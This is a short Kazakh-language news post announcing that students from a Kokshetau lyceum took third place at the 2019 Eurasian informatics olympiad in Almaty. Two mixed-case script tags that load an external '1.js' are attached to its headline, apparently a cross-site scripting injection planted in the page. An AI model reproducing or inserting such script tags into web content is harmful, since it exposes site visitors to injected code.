2019 жылдың 29-30 қараша аралығында өткен информатика пәнінен XI халықаралық Еуразиялық олимпиаданың қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.12.2019

2019 жылдың  29-30 қараша  күндері аралығында Алматы қаласы, Әл-Фараби атындағы Қазақ Ұлттық университетінің базасында 11 сынып оқушыларына арналған информатика пәнінен  XI халықаралық Еуразиялық олимпиаданың қорытынды кезеңі өткізілді. 

Еуразиялық олимпиаданың мақсаты: оқушылардың ақпараттық құзіреттілігін қалыптастыру, оқушылардың ақпараттық мәдениетін дамыту және компьютерлік модельдеу, ақпараттық технологиялар саласындағы ең дарынды жастарды анықтау.

Олимпиадаға Қазақстан, Ресей, Қырғызстан, Өзбекстан  мемлекеттерінен оқушылар қатысты. Ақмола облысынан  аталмыш олимпиадаға 2 команда барлығы 6  қатысушы қатысты. Жеке және командалық есепте Көкшетау қаласы, «Білім-инновация» лицей-интернатының 11 сынып оқушылары  Кеңес Алмас, Шарипов Амирлан, Темирбаев Ильяс 3 орын иегерлері атанды.  

Жүлдегерлерімізді шын жүректен құттықтаймыз! Әлі талай жетістіктеріңіздің куәсі  болайық!

Просмотров: 514


Пікір қосу



Деректерді қолтаңбаға қосу